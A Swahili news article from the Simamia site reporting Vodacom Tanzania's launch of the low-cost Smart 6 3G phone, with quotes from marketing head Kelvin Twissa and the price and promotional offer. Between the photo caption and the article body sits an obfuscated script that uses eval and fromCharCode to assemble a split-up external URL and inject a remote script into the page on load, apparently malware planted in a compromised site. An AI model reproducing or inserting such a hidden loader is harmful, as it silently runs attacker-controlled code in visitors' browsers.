<p>Mkuu wa Masoko na Mawasiliano wa Vodacom Tanzania, Kelvin Twissa akiwaonesha waandishi wa habari simu mpya aina ya Smart 6 wakati wa uzinduzi wa simu hiyo yenye uwezo wa Intaneti ya 3G Dar es Salaam jana. Mwingine ni Mkuu wa Huduma na Bidhaa wa kampuni hiyo, Samson Mwongela. (Picha kwa hisani ya Vodacom).</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
KATIKA kuhakikisha wateja wake wanakwenda na wakati kiteknolojia na kupata huduma bora za mawasiliano kwa kutumia mtandao wa intaneti, kampuni ya Vodacom Tanzania imezindua simu mpya ya Smart 6 ya gharama nafuu.
Akizungumza wakati wa uzinduzi wa simu hiyo juzi, Mkuu wa Masoko na Mawasiliano wa kampuni hiyo, Kelvin Twissa alisema simu hiyo imewalenga wateja wenye vipato vya kawaida ili kuwawezesha kufurahia huduma za kisasa za matumizi ya simu za mkononi za Smartphone.
âVodacom siku zote tumekuwa tukiwasikiliza wateja wetu na ndio maana tumeingiza sokoni simu hii ili kuwawezesha kufurahia matumizi ya simu za kisasa kupata huduma za intaneti na programu nyinginezo za kurahisisha maisha yao,â alisema Twissa.
Aliongeza kuwa, simu aina ya Smart 6 ambayo itakuwa inauzwa kwa Sh 90,000- ina kioo kikubwa kinachomwezesha mtumiaji kusoma na kuangalia taarifa kwa urahisi,ina kamera ya kisasa,uwezo zaidi wa kuperuzi intaneti ya 3G, nafasi kubwa ya kuweka kumbukumbu na inakaa na betri kwa muda mrefu.
Alisema simu hizo zinapatikana katika maduka yote ya Vodacom na katika matamasha yote yanayofanywa na Vodacom nchi nzima.
âMteja yeyote atakayenunua simu hii atajipatia ofa kabambe kabisa ya kupata 500MB bure na uwezo wa kutuma jumbe fupi za maneno zipatazo 200 kila mwezi kwa kipindi cha miezi 6 bure,â alisema na kuwataka wateja wa Vodacom na wananchi kwa ujumla kuchangamkia fursa hii na kukamata Smart 6 kwa gharama nafuu.
OP Habari Leo
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments